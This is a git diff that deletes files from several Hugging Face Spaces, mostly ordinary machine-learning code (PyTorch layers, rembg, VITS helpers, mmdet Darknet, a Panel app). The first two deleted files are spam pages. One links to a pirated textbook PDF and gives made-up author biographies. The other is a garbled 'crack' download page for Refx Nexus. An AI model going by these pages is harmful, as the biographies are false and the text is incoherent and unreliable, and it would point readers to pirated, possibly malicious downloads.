    \ No newline at end of file diff --git a/spaces/diacanFperku/AutoGPT/QuantitativeMethodsforBusiness12thedpdf NEW!.md b/spaces/diacanFperku/AutoGPT/QuantitativeMethodsforBusiness12thedpdf NEW!.md deleted file mode 100644 index 0084f31b63a5f8c9a1a73ec2ab1348434309e59a..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/QuantitativeMethodsforBusiness12thedpdf NEW!.md +++ /dev/null @@ -1,16 +0,0 @@ -

    QuantitativeMethodsforBusiness12thedpdf


    Download Ziphttps://gohhs.com/2uFUSW



    -
    -Eileen P. Quinn, and James B. Milgram, NIST The National Institute of Standards and Technology, Gaithersburg, MD, 1998. £375 - -About the Authors - -David R. Anderson, Ph.D. is the Edmund L. Starling Professor of Telecommunications and an Associate Dean in the College of Engineering at the Georgia Institute of Technology. His primary research interest is on the development of theory and the application of optimal control to communications. He has done over fifty years of research in the theory and applications of nonlinear systems to communications and is also known for his popular textbook on the subject, “Optimal Control of Dynamic Systems.” He has also written several popular books for the engineering general reader. He is a Fellow of the American Academy of Arts and Sciences, and a member of the National Academy of Engineering. - -Dennis J. Sweeney, Ph.D. is an Associate Professor of Management at the Massachusetts Institute of Technology, specializing in the behavioral and organizational aspects of the firm. He has held postdoctoral appointments at the University of Pennsylvania and at the Massachusetts Institute of Technology, and has worked in the private sector for many years. Dr. Sweeney has published many articles in journals such as Organization Science and Management Science, and is the author of a book on the relationship between management and strategy. He is currently the editor of the Journal of the Academy of Management, and past editor of the Journal of Product and Brand Management. - -Thomas A. Williams, Ph.D. is a Professor of Management and Director of the Massachusetts Institute of Technology’s Entrepreneurship Program. His research, which includes the development of measures of innovation, has been published in prestigious journals such as the Journal of Marketing Research and the Journal of Marketing, and he is a Fellow of the American Marketing Association. He has also authored four books: Entrepreneurship and the Pursuit of Happiness, The Social Ecology of Small Business, Innovative Survival and Timescales of Progress. His current work is focused on the use of quantitative methods to study human behavior, and he is particularly interested in the connection between business performance and personal satisfaction. - -Jeffrey D. Camm is an Associate Professor at the University of Wisconsin at Madison, where he teaches in the department of kinesiology and sports management. He received his doctorate in sport management from the University of Texas, and his research interests include the measurement of individual and team sports performance, the development of effective coaching techniques, and the psychology of youth sport. 4fefd39f24
    -
    -
    -

    diff --git a/spaces/diacanFperku/AutoGPT/Refx Nexus 2.3.4 BEST Crack Mega.md b/spaces/diacanFperku/AutoGPT/Refx Nexus 2.3.4 BEST Crack Mega.md deleted file mode 100644 index 9a81f18231830c32fa26ae951a59bfcb32740111..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Refx Nexus 2.3.4 BEST Crack Mega.md +++ /dev/null @@ -1,18 +0,0 @@ -

    refx nexus 2.3.4 crack mega


    Download Zip ===== https://gohhs.com/2uFSZE



    - -co.nz - -refx nexus 2.3.4 crack Mega.co.nz - -Although there are no torrents for the 16.04.3 ISOs, I’ve uploaded them to the Mega.co.nz website. - -I’m also including all of the files that the release server includes as well. There are a lot of images, including a custom Linux Mint installation ISO that you can use to upgrade or download just the new release ISO files. - -The download links are provided on the main page as well as the Torrent link. I’ll be continuing to update these links as more information becomes available. - -refx nexus 2.3.4 crack - -ref 4fefd39f24
    -
    -
    -

    diff --git a/spaces/diaoren/OpenSetObstacleDetection/opendet2/modeling/layers/mlp.py b/spaces/diaoren/OpenSetObstacleDetection/opendet2/modeling/layers/mlp.py deleted file mode 100644 index aa714d0a9ce96eb8523f3cd378604e26b361f127..0000000000000000000000000000000000000000 --- a/spaces/diaoren/OpenSetObstacleDetection/opendet2/modeling/layers/mlp.py +++ /dev/null @@ -1,46 +0,0 @@ -import torch -import torch.nn as nn -import torch.nn.functional as F -import fvcore.nn.weight_init as weight_init - - -class MLP(nn.Module): - def __init__(self, in_dim, out_dim, hidden_dim=None): - super().__init__() - if not hidden_dim: - hidden_dim = in_dim - self.head = nn.Sequential( - nn.Linear(in_dim, hidden_dim), - nn.ReLU(inplace=True), - nn.Linear(hidden_dim, out_dim), - ) - for layer in self.head: - if isinstance(layer, nn.Linear): - weight_init.c2_xavier_fill(layer) - - def forward(self, x): - feat = self.head(x) - feat_norm = F.normalize(feat, dim=1) - return feat_norm - - -class ConvMLP(nn.Module): - def __init__(self, in_dim, out_dim, hidden_dim=None): - super().__init__() - if not hidden_dim: - hidden_dim = in_dim - self.head = nn.Sequential( - nn.Conv2d(in_dim, hidden_dim, kernel_size=3, stride=1, padding=1), - nn.ReLU(inplace=True), - nn.Conv2d(hidden_dim, out_dim, kernel_size=3, stride=1, padding=1), - ) - # Initialization - for layer in self.head: - if isinstance(layer, nn.Conv2d): - torch.nn.init.normal_(layer.weight, mean=0, std=0.01) - torch.nn.init.constant_(layer.bias, 0) - - def forward(self, x): - feat = self.head(x) - feat_norm = F.normalize(feat, dim=1) - return feat_norm \ No newline at end of file diff --git a/spaces/diego2554/RemBG_super/rembg/sessions/u2net.py b/spaces/diego2554/RemBG_super/rembg/sessions/u2net.py deleted file mode 100644 index e984b182d87ac4e2357478c2a6f55e445cf2f721..0000000000000000000000000000000000000000 --- a/spaces/diego2554/RemBG_super/rembg/sessions/u2net.py +++ /dev/null @@ -1,51 +0,0 @@ -import os -from typing import List - -import numpy as np -import pooch -from PIL import Image -from PIL.Image import Image as PILImage - -from .base import BaseSession - - -class U2netSession(BaseSession): - def predict(self, img: PILImage, *args, **kwargs) -> List[PILImage]: - ort_outs = self.inner_session.run( - None, - self.normalize( - img, (0.485, 0.456, 0.406), (0.229, 0.224, 0.225), (320, 320) - ), - ) - - pred = ort_outs[0][:, 0, :, :] - - ma = np.max(pred) - mi = np.min(pred) - - pred = (pred - mi) / (ma - mi) - pred = np.squeeze(pred) - - mask = Image.fromarray((pred * 255).astype("uint8"), mode="L") - mask = mask.resize(img.size, Image.LANCZOS) - - return [mask] - - @classmethod - def download_models(cls, *args, **kwargs): - fname = f"{cls.name()}.onnx" - pooch.retrieve( - "https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx", - None - if cls.checksum_disabled(*args, **kwargs) - else "md5:60024c5c889badc19c04ad937298a77b", - fname=fname, - path=cls.u2net_home(*args, **kwargs), - progressbar=True, - ) - - return os.path.join(cls.u2net_home(), fname) - - @classmethod - def name(cls, *args, **kwargs): - return "u2net" diff --git a/spaces/digitalxingtong/Bufeiyan-b-Bert-VITS2/monotonic_align/__init__.py b/spaces/digitalxingtong/Bufeiyan-b-Bert-VITS2/monotonic_align/__init__.py deleted file mode 100644 index a323673bb16070d6d0fffddb939b657d0915ff1b..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Bufeiyan-b-Bert-VITS2/monotonic_align/__init__.py +++ /dev/null @@ -1,20 +0,0 @@ -from numpy import zeros, int32, float32 -from torch import from_numpy - -from .core import maximum_path_jit - - -def maximum_path(neg_cent, mask): - """ numba optimized version. - neg_cent: [b, t_t, t_s] - mask: [b, t_t, t_s] - """ - device = neg_cent.device - dtype = neg_cent.dtype - neg_cent = neg_cent.data.cpu().numpy().astype(float32) - path = zeros(neg_cent.shape, dtype=int32) - - t_t_max = mask.sum(1)[:, 0].data.cpu().numpy().astype(int32) - t_s_max = mask.sum(2)[:, 0].data.cpu().numpy().astype(int32) - maximum_path_jit(path, neg_cent, t_t_max, t_s_max) - return from_numpy(path).to(device=device, dtype=dtype) \ No newline at end of file diff --git a/spaces/digitalxingtong/Jiuxia-Bert-Vits2/text/__init__.py b/spaces/digitalxingtong/Jiuxia-Bert-Vits2/text/__init__.py deleted file mode 100644 index 7566bf351ca9b95af9cdc6d729557a9da083800f..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Jiuxia-Bert-Vits2/text/__init__.py +++ /dev/null @@ -1,28 +0,0 @@ -from text.symbols import * - - -_symbol_to_id = {s: i for i, s in enumerate(symbols)} - -def cleaned_text_to_sequence(cleaned_text, tones, language): - '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text. - Args: - text: string to convert to a sequence - Returns: - List of integers corresponding to the symbols in the text - ''' - phones = [_symbol_to_id[symbol] for symbol in cleaned_text] - tone_start = language_tone_start_map[language] - tones = [i + tone_start for i in tones] - lang_id = language_id_map[language] - lang_ids = [lang_id for i in phones] - return phones, tones, lang_ids - -def get_bert(norm_text, word2ph, language): - from .chinese_bert import get_bert_feature as zh_bert - from .english_bert_mock import get_bert_feature as en_bert - lang_bert_func_map = { - 'ZH': zh_bert, - 'EN': en_bert - } - bert = lang_bert_func_map[language](norm_text, word2ph) - return bert diff --git a/spaces/dineshreddy/WALT/mmcv_custom/runner/checkpoint.py b/spaces/dineshreddy/WALT/mmcv_custom/runner/checkpoint.py deleted file mode 100644 index b04167e0fc5f16bc33e793830ebb9c4ef15ef1ed..0000000000000000000000000000000000000000 --- a/spaces/dineshreddy/WALT/mmcv_custom/runner/checkpoint.py +++ /dev/null @@ -1,85 +0,0 @@ -# Copyright (c) Open-MMLab. All rights reserved. -import os.path as osp -import time -from tempfile import TemporaryDirectory - -import torch -from torch.optim import Optimizer - -import mmcv -from mmcv.parallel import is_module_wrapper -from mmcv.runner.checkpoint import weights_to_cpu, get_state_dict - -try: - import apex -except: - print('apex is not installed') - - -def save_checkpoint(model, filename, optimizer=None, meta=None): - """Save checkpoint to file. - - The checkpoint will have 4 fields: ``meta``, ``state_dict`` and - ``optimizer``, ``amp``. By default ``meta`` will contain version - and time info. - - Args: - model (Module): Module whose params are to be saved. - filename (str): Checkpoint filename. - optimizer (:obj:`Optimizer`, optional): Optimizer to be saved. - meta (dict, optional): Metadata to be saved in checkpoint. - """ - if meta is None: - meta = {} - elif not isinstance(meta, dict): - raise TypeError(f'meta must be a dict or None, but got {type(meta)}') - meta.update(mmcv_version=mmcv.__version__, time=time.asctime()) - - if is_module_wrapper(model): - model = model.module - - if hasattr(model, 'CLASSES') and model.CLASSES is not None: - # save class name to the meta - meta.update(CLASSES=model.CLASSES) - - checkpoint = { - 'meta': meta, - 'state_dict': weights_to_cpu(get_state_dict(model)) - } - # save optimizer state dict in the checkpoint - if isinstance(optimizer, Optimizer): - checkpoint['optimizer'] = optimizer.state_dict() - elif isinstance(optimizer, dict): - checkpoint['optimizer'] = {} - for name, optim in optimizer.items(): - checkpoint['optimizer'][name] = optim.state_dict() - - # save amp state dict in the checkpoint - checkpoint['amp'] = apex.amp.state_dict() - - if filename.startswith('pavi://'): - try: - from pavi import modelcloud - from pavi.exception import NodeNotFoundError - except ImportError: - raise ImportError( - 'Please install pavi to load checkpoint from modelcloud.') - model_path = filename[7:] - root = modelcloud.Folder() - model_dir, model_name = osp.split(model_path) - try: - model = modelcloud.get(model_dir) - except NodeNotFoundError: - model = root.create_training_model(model_dir) - with TemporaryDirectory() as tmp_dir: - checkpoint_file = osp.join(tmp_dir, model_name) - with open(checkpoint_file, 'wb') as f: - torch.save(checkpoint, f) - f.flush() - model.create_file(checkpoint_file, name=model_name) - else: - mmcv.mkdir_or_exist(osp.dirname(filename)) - # immediately flush buffer - with open(filename, 'wb') as f: - torch.save(checkpoint, f) - f.flush() diff --git a/spaces/dineshreddy/WALT/mmdet/models/backbones/darknet.py b/spaces/dineshreddy/WALT/mmdet/models/backbones/darknet.py deleted file mode 100644 index 517fe26259217792e0dad80ca3824d914cfe3904..0000000000000000000000000000000000000000 --- a/spaces/dineshreddy/WALT/mmdet/models/backbones/darknet.py +++ /dev/null @@ -1,199 +0,0 @@ -# Copyright (c) 2019 Western Digital Corporation or its affiliates. - -import logging - -import torch.nn as nn -from mmcv.cnn import ConvModule, constant_init, kaiming_init -from mmcv.runner import load_checkpoint -from torch.nn.modules.batchnorm import _BatchNorm - -from ..builder import BACKBONES - - -class ResBlock(nn.Module): - """The basic residual block used in Darknet. Each ResBlock consists of two - ConvModules and the input is added to the final output. Each ConvModule is - composed of Conv, BN, and LeakyReLU. In YoloV3 paper, the first convLayer - has half of the number of the filters as much as the second convLayer. The - first convLayer has filter size of 1x1 and the second one has the filter - size of 3x3. - - Args: - in_channels (int): The input channels. Must be even. - conv_cfg (dict): Config dict for convolution layer. Default: None. - norm_cfg (dict): Dictionary to construct and config norm layer. - Default: dict(type='BN', requires_grad=True) - act_cfg (dict): Config dict for activation layer. - Default: dict(type='LeakyReLU', negative_slope=0.1). - """ - - def __init__(self, - in_channels, - conv_cfg=None, - norm_cfg=dict(type='BN', requires_grad=True), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1)): - super(ResBlock, self).__init__() - assert in_channels % 2 == 0 # ensure the in_channels is even - half_in_channels = in_channels // 2 - - # shortcut - cfg = dict(conv_cfg=conv_cfg, norm_cfg=norm_cfg, act_cfg=act_cfg) - - self.conv1 = ConvModule(in_channels, half_in_channels, 1, **cfg) - self.conv2 = ConvModule( - half_in_channels, in_channels, 3, padding=1, **cfg) - - def forward(self, x): - residual = x - out = self.conv1(x) - out = self.conv2(out) - out = out + residual - - return out - - -@BACKBONES.register_module() -class Darknet(nn.Module): - """Darknet backbone. - - Args: - depth (int): Depth of Darknet. Currently only support 53. - out_indices (Sequence[int]): Output from which stages. - frozen_stages (int): Stages to be frozen (stop grad and set eval mode). - -1 means not freezing any parameters. Default: -1. - conv_cfg (dict): Config dict for convolution layer. Default: None. - norm_cfg (dict): Dictionary to construct and config norm layer. - Default: dict(type='BN', requires_grad=True) - act_cfg (dict): Config dict for activation layer. - Default: dict(type='LeakyReLU', negative_slope=0.1). - norm_eval (bool): Whether to set norm layers to eval mode, namely, - freeze running stats (mean and var). Note: Effect on Batch Norm - and its variants only. - - Example: - >>> from mmdet.models import Darknet - >>> import torch - >>> self = Darknet(depth=53) - >>> self.eval() - >>> inputs = torch.rand(1, 3, 416, 416) - >>> level_outputs = self.forward(inputs) - >>> for level_out in level_outputs: - ... print(tuple(level_out.shape)) - ... - (1, 256, 52, 52) - (1, 512, 26, 26) - (1, 1024, 13, 13) - """ - - # Dict(depth: (layers, channels)) - arch_settings = { - 53: ((1, 2, 8, 8, 4), ((32, 64), (64, 128), (128, 256), (256, 512), - (512, 1024))) - } - - def __init__(self, - depth=53, - out_indices=(3, 4, 5), - frozen_stages=-1, - conv_cfg=None, - norm_cfg=dict(type='BN', requires_grad=True), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1), - norm_eval=True): - super(Darknet, self).__init__() - if depth not in self.arch_settings: - raise KeyError(f'invalid depth {depth} for darknet') - self.depth = depth - self.out_indices = out_indices - self.frozen_stages = frozen_stages - self.layers, self.channels = self.arch_settings[depth] - - cfg = dict(conv_cfg=conv_cfg, norm_cfg=norm_cfg, act_cfg=act_cfg) - - self.conv1 = ConvModule(3, 32, 3, padding=1, **cfg) - - self.cr_blocks = ['conv1'] - for i, n_layers in enumerate(self.layers): - layer_name = f'conv_res_block{i + 1}' - in_c, out_c = self.channels[i] - self.add_module( - layer_name, - self.make_conv_res_block(in_c, out_c, n_layers, **cfg)) - self.cr_blocks.append(layer_name) - - self.norm_eval = norm_eval - - def forward(self, x): - outs = [] - for i, layer_name in enumerate(self.cr_blocks): - cr_block = getattr(self, layer_name) - x = cr_block(x) - if i in self.out_indices: - outs.append(x) - - return tuple(outs) - - def init_weights(self, pretrained=None): - if isinstance(pretrained, str): - logger = logging.getLogger() - load_checkpoint(self, pretrained, strict=False, logger=logger) - elif pretrained is None: - for m in self.modules(): - if isinstance(m, nn.Conv2d): - kaiming_init(m) - elif isinstance(m, (_BatchNorm, nn.GroupNorm)): - constant_init(m, 1) - - else: - raise TypeError('pretrained must be a str or None') - - def _freeze_stages(self): - if self.frozen_stages >= 0: - for i in range(self.frozen_stages): - m = getattr(self, self.cr_blocks[i]) - m.eval() - for param in m.parameters(): - param.requires_grad = False - - def train(self, mode=True): - super(Darknet, self).train(mode) - self._freeze_stages() - if mode and self.norm_eval: - for m in self.modules(): - if isinstance(m, _BatchNorm): - m.eval() - - @staticmethod - def make_conv_res_block(in_channels, - out_channels, - res_repeat, - conv_cfg=None, - norm_cfg=dict(type='BN', requires_grad=True), - act_cfg=dict(type='LeakyReLU', - negative_slope=0.1)): - """In Darknet backbone, ConvLayer is usually followed by ResBlock. This - function will make that. The Conv layers always have 3x3 filters with - stride=2. The number of the filters in Conv layer is the same as the - out channels of the ResBlock. - - Args: - in_channels (int): The number of input channels. - out_channels (int): The number of output channels. - res_repeat (int): The number of ResBlocks. - conv_cfg (dict): Config dict for convolution layer. Default: None. - norm_cfg (dict): Dictionary to construct and config norm layer. - Default: dict(type='BN', requires_grad=True) - act_cfg (dict): Config dict for activation layer. - Default: dict(type='LeakyReLU', negative_slope=0.1). - """ - - cfg = dict(conv_cfg=conv_cfg, norm_cfg=norm_cfg, act_cfg=act_cfg) - - model = nn.Sequential() - model.add_module( - 'conv', - ConvModule( - in_channels, out_channels, 3, stride=2, padding=1, **cfg)) - for idx in range(res_repeat): - model.add_module('res{}'.format(idx), - ResBlock(out_channels, **cfg)) - return model diff --git a/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r18_fpem_ffm.py b/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r18_fpem_ffm.py deleted file mode 100644 index a69a4d87603275bc1f89b5f58c722d79274e4fd7..0000000000000000000000000000000000000000 --- a/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r18_fpem_ffm.py +++ /dev/null @@ -1,43 +0,0 @@ -model_poly = dict( - type='PANet', - backbone=dict( - type='mmdet.ResNet', - depth=18, - num_stages=4, - out_indices=(0, 1, 2, 3), - frozen_stages=-1, - norm_cfg=dict(type='SyncBN', requires_grad=True), - init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet18'), - norm_eval=True, - style='caffe'), - neck=dict(type='FPEM_FFM', in_channels=[64, 128, 256, 512]), - bbox_head=dict( - type='PANHead', - in_channels=[128, 128, 128, 128], - out_channels=6, - loss=dict(type='PANLoss'), - postprocessor=dict(type='PANPostprocessor', text_repr_type='poly')), - train_cfg=None, - test_cfg=None) - -model_quad = dict( - type='PANet', - backbone=dict( - type='mmdet.ResNet', - depth=18, - num_stages=4, - out_indices=(0, 1, 2, 3), - frozen_stages=-1, - norm_cfg=dict(type='SyncBN', requires_grad=True), - init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet18'), - norm_eval=True, - style='caffe'), - neck=dict(type='FPEM_FFM', in_channels=[64, 128, 256, 512]), - bbox_head=dict( - type='PANHead', - in_channels=[128, 128, 128, 128], - out_channels=6, - loss=dict(type='PANLoss'), - postprocessor=dict(type='PANPostprocessor', text_repr_type='quad')), - train_cfg=None, - test_cfg=None) diff --git a/spaces/dmeck/RVC-Speakers/vits/modules/layer/__init__.py b/spaces/dmeck/RVC-Speakers/vits/modules/layer/__init__.py deleted file mode 100644 index 6fd834d984753844d67100a951f3f5a5a0834d6b..0000000000000000000000000000000000000000 --- a/spaces/dmeck/RVC-Speakers/vits/modules/layer/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from vits.modules.layer.modules import * diff --git a/spaces/enzostvs/hub-api-playground/components/editor/main/snippet/python.tsx b/spaces/enzostvs/hub-api-playground/components/editor/main/snippet/python.tsx deleted file mode 100644 index 1a65c723076bb9c088fcf11a5521978ce2885189..0000000000000000000000000000000000000000 --- a/spaces/enzostvs/hub-api-playground/components/editor/main/snippet/python.tsx +++ /dev/null @@ -1,108 +0,0 @@ -import { ApiRoute } from "@/utils/type"; -import classNames from "classnames"; -import { useState } from "react"; -import Highlight from "react-highlight"; -import { BiLogoPython, BiSolidCopy } from "react-icons/bi"; -import { Options } from "redaxios"; - -export const PythonSnippet = ({ - endpoint, - headers, - parameters, - body, - onCopyToClipboard, -}: { - endpoint: ApiRoute; - parameters?: Record; - headers?: Record; - body?: Options | undefined; - onCopyToClipboard: (e: string) => void; -}) => { - const [isCopied, setIsCopied] = useState(false); - - const generatePythonRequestFromEndpoint = () => { - const { method, path } = endpoint; - const fullpath = `${process.env.NEXT_PUBLIC_APP_APIURL}${path}`; - - const removeEmptyValues = (data: Record) => { - const formattedData = { ...data }; - Object.entries(formattedData).forEach(([key, value]) => { - if (!value) { - delete formattedData[key]; - } - if (typeof value === "boolean") { - formattedData[key] = value ? "True" : "False"; - } - }); - return formattedData; - }; - - const Dict: Record = { - GET: () => { - const filteredEmptyParameters = removeEmptyValues(parameters ?? {}); - - return `import requests -response = requests.get( - "${fullpath}", - params=${JSON.stringify(filteredEmptyParameters)}, - headers=${JSON.stringify(headers)} -)`; - }, - DELETE: () => { - const formattedBody = removeEmptyValues(body ?? {}); - return `import requests -response = requests.delete( - "${fullpath}", - data=${JSON.stringify(formattedBody)}, - headers=${JSON.stringify(headers)} -)`; - }, - DEFAULT: () => { - const formattedBody = removeEmptyValues(body ?? {}); - return `import requests -response = requests.${method.toLocaleLowerCase()}( - "${fullpath}", - json=${JSON.stringify(formattedBody)}, - headers=${JSON.stringify(headers)} -)`; - }, - }; - - return Dict[method] ? Dict[method]() : Dict["DEFAULT"](); - }; - - const handleCopy = () => { - onCopyToClipboard(generatePythonRequestFromEndpoint()); - setIsCopied(true); - setTimeout(() => { - setIsCopied(false); - }, 1000); - }; - - return ( -
    -
    - -

    Python

    -
    -
    - - {generatePythonRequestFromEndpoint()} - -
    - -
    - Copied! -
    -
    -
    -
    - ); -}; diff --git a/spaces/eugenkalosha/Semmap/app.py b/spaces/eugenkalosha/Semmap/app.py deleted file mode 100644 index d400c35940bbaef2c00eb3b1b6f1ca0d3ece5f5f..0000000000000000000000000000000000000000 --- a/spaces/eugenkalosha/Semmap/app.py +++ /dev/null @@ -1,199 +0,0 @@ -import pandas as pd -import numpy as np -from holoviews.operation.datashader import datashade, dynspread, rasterize -from holoviews.streams import Stream, param -from datafiles import * -from columnnames import * -from helpcomponents import * -from semmap import Semmap -from tapselection import TapSelection - - -import panel as pn -pn.extension('tabulator', 'plotly') -import holoviews as hv -hv.extension('bokeh') - -########################################## -########################################## - -words_lst = dataset2list(HF_DATASET, WORDS_FILE_NAME) -words_nmb = len(words_lst) -topic_list = dataset2list(HF_DATASET, TOPICS_FILE_NAME) -tpc_nmb = len(topic_list) - - -semmap = Semmap(words_lst, topic_list) - -########################################## -########################################## - -CSS_tabulator = """ -.tabulator { - font-size: 12px !important; -} -.tabulator-header{ - padding: 4px; -} -.tabulator-col{ - padding: 0px !important; -} -.tabulator-col-content{ - padding: 0px !important; -} -.tabulator-row{ - padding: 0px !important; - min-height: 5px !important; -} -.tabulator-cell{ - padding: 4px !important; -} -.tabulator-footer{ - padding: 0px !important; -} -""" - -df_words = pd.DataFrame({VZ_SCORE: [], VZ_WORDS: [], VZ_IDS: []}, columns=[VZ_SCORE, VZ_WORDS, VZ_IDS]) -df_words = df_words.astype(dtype={VZ_SCORE: "int64", VZ_WORDS: "string", VZ_IDS: "int64"}) - -Word = Stream.define('Word', w=param.Integer(default=-1), r=param.Integer(default=-1)) -wrd_stream = Word() - -umap_points = hv.Points(semmap.getUmap2D()) -semantic_map = datashade(umap_points) -semantic_map.opts(tools=['box_select'], bgcolor='white', height=700, width=700) - -def selected_info(bounds): - if bounds: - rectangle = np.array( - [[bounds[0], bounds[1]], [bounds[0], bounds[3]], [bounds[2], bounds[3]], [bounds[2], bounds[1]]]) - return hv.Polygons(rectangle).opts(line_color='red', fill_alpha=0) - else: - return hv.Polygons([[0, 0]]).opts(alpha=0) - - -########################################## -########################################## - -tb1_tapselection = TapSelection() - - -def tb1_rngx_subscriber(x_range): - tb1_tapselection.setx(x_range) - - -def tb1_rngy_subscriber(y_range): - tb1_tapselection.sety(y_range) - - -tb1_words_widget = pn.widgets.Tabulator(df_words, - editors={VZ_SCORE: None, VZ_WORDS: None}, - titles={VZ_SCORE: VZ_SCORE, VZ_WORDS: VZ_WORDS}, - hidden_columns=[VZ_IDS], - page_size=25, show_index=False, - widths={VZ_SCORE: 75, VZ_WORDS: 150}, - stylesheets=[CSS_tabulator], - ) - -tb1_topic_df = pd.DataFrame({VZ_SCORE: [], VZ_TOPIC: [], VZ_IDS: []}, columns=[VZ_SCORE, VZ_TOPIC, VZ_IDS]) -tb1_topic_df = tb1_topic_df.astype(dtype={VZ_SCORE: "int64", VZ_TOPIC: "string", VZ_IDS: "int64"}) -tb1_topiclist_widget = pn.widgets.Tabulator(tb1_topic_df, - editors={VZ_SCORE: None, VZ_TOPIC: None, VZ_IDS: None}, - titles={VZ_SCORE: "score", VZ_TOPIC: "topic name"}, - hidden_columns=[VZ_IDS], - page_size=25, show_index=False, - widths={VZ_SCORE: 75, VZ_TOPIC: 250}, - stylesheets=[CSS_tabulator], - ) - -tb1_button_hide = pn.widgets.Button(name='Hide', button_type='primary', margin=(15, 0, 0, 0)) - -def tb1_hide_callback(e): - info_pn.object = "" - tb1_wrd_map.event(w=-1, r=-1) - -tb1_button_hide.on_click(tb1_hide_callback) - -def tb1_wordMap(w, r): - if w != -1: - coord = semmap.wordPoints(w) - return hv.Points(coord).opts(color='red', alpha=1) - if r != -1: - coord = semmap.topicPoints(r) - return hv.Points(coord).opts(color='yellow', alpha=1) - return hv.Points([0, 0]).opts(alpha=0) - -tb1_wrd_map = hv.DynamicMap(tb1_wordMap, streams=[wrd_stream]) - -def tb1_words_callback(e): - row = e.row - ind = int(tb1_words_widget.value.iloc[row, 2]) - info_pn.object = "Word '" + words_lst[ind] + "'" - tb1_wrd_map.event(w=ind, r=-1) - -tb1_words_widget.on_click(tb1_words_callback) - -def tb1_topiclist_callback(e): - row = e.row - ind = int(tb1_topiclist_widget.value.iloc[row, 2]) - info_pn.object = "Topic '" + topic_list[ind] + "'" - tb1_wrd_map.event(r=ind, w=-1) - -tb1_topiclist_widget.on_click(tb1_topiclist_callback) - -maxTableSize = 25 - -def tb1_tap_subscriber(x, y): - if x and y: - bounds = tb1_tapselection.getBound(x, y) - wrd_tbl, tpc_tbl = semmap.getTables(bounds) - tb1_words_widget.value = wrd_tbl - tb1_topiclist_widget.value = tpc_tbl - - -tb1_stream_tap = hv.streams.SingleTap(source=tb1_wrd_map) -tb1_stream_tap.add_subscriber(tb1_tap_subscriber) - -tb1_stream_rngx = hv.streams.RangeX(source=semantic_map) -tb1_stream_rngx.add_subscriber(tb1_rngx_subscriber) -tb1_stream_rngy = hv.streams.RangeY(source=semantic_map) -tb1_stream_rngy.add_subscriber(tb1_rngy_subscriber) - - -def selected_info(x, y): - if x and y: - xmin, ymin, xmax, ymax = tb1_tapselection.getBound(x, y) - bounds = np.array([xmin, ymin, xmax, ymax]) - rectangle = np.array( - [[bounds[0], bounds[1]], [bounds[0], bounds[3]], [bounds[2], bounds[3]], [bounds[2], bounds[1]]]) - return hv.Polygons(rectangle).opts(line_color='lightgreen', alpha=1, fill_alpha=0, line_width=5) - else: - xmin, ymin, xmax, ymax = (0, 0, 0, 0) - bounds = np.array([xmin, ymin, xmax, ymax]) - rectangle = np.array( - [[bounds[0], bounds[1]], [bounds[0], bounds[3]], [bounds[2], bounds[3]], [bounds[2], bounds[1]]]) - return hv.Polygons(rectangle).opts(alpha=0) - - -tb1_selected_points = hv.DynamicMap(selected_info, streams=[tb1_stream_tap]) -semantic_map.opts(tools=["pan", "box_zoom", "wheel_zoom", "reset"]) -tb1_semmap_show = semantic_map * tb1_wrd_map * tb1_selected_points - -info_pn = pn.pane.Str("", styles={'font-size': '12pt'}, margin=(0, 0, 0, 50)); - -cl_topics = pn.Column(pn.Row("# Topics", hlp_topics), tb1_topiclist_widget) -cl_semmap = pn.Column(pn.Row(pn.Spacer(width=200), "# Semantic Map", hlp_semmap, tb1_button_hide), info_pn, tb1_semmap_show) -cl_words = pn.Column(pn.Row("# Words", hlp_words), tb1_words_widget) -rw_app = pn.Row(cl_topics, cl_semmap, cl_words) - -tb1_template = pn.template.BootstrapTemplate( - title='Wikipedia Semantic Map', sidebar_width = 450 -) -tb1_template.main.append(rw_app) -tb1_template.sidebar.append(help_sidebar_pane) - -########################################## -########################################## - -tb1_template.servable() - diff --git a/spaces/f2api/gpt-academic/crazy_functions/test_project/latex/attention/introduction.tex b/spaces/f2api/gpt-academic/crazy_functions/test_project/latex/attention/introduction.tex deleted file mode 100644 index 1baa8915f4cf7aec2520894a87470fc9436d954b..0000000000000000000000000000000000000000 --- a/spaces/f2api/gpt-academic/crazy_functions/test_project/latex/attention/introduction.tex +++ /dev/null @@ -1,18 +0,0 @@ -Recurrent neural networks, long short-term memory \citep{hochreiter1997} and gated recurrent \citep{gruEval14} neural networks in particular, have been firmly established as state of the art approaches in sequence modeling and transduction problems such as language modeling and machine translation \citep{sutskever14, bahdanau2014neural, cho2014learning}. Numerous efforts have since continued to push the boundaries of recurrent language models and encoder-decoder architectures \citep{wu2016google,luong2015effective,jozefowicz2016exploring}. - -Recurrent models typically factor computation along the symbol positions of the input and output sequences. Aligning the positions to steps in computation time, they generate a sequence of hidden states $h_t$, as a function of the previous hidden state $h_{t-1}$ and the input for position $t$. This inherently sequential nature precludes parallelization within training examples, which becomes critical at longer sequence lengths, as memory constraints limit batching across examples. -%\marginpar{not sure if the memory constraints are understandable here} -Recent work has achieved significant improvements in computational efficiency through factorization tricks \citep{Kuchaiev2017Factorization} and conditional computation \citep{shazeer2017outrageously}, while also improving model performance in case of the latter. The fundamental constraint of sequential computation, however, remains. - -%\marginpar{@all: there is work on analyzing what attention really does in seq2seq models, couldn't find it right away} - -Attention mechanisms have become an integral part of compelling sequence modeling and transduction models in various tasks, allowing modeling of dependencies without regard to their distance in the input or output sequences \citep{bahdanau2014neural, structuredAttentionNetworks}. In all but a few cases \citep{decomposableAttnModel}, however, such attention mechanisms are used in conjunction with a recurrent network. - -%\marginpar{not sure if "cross-positional communication" is understandable without explanation} -%\marginpar{insert exact training times and stats for the model that reaches sota earliest, maybe even a single GPU model?} - -In this work we propose the Transformer, a model architecture eschewing recurrence and instead relying entirely on an attention mechanism to 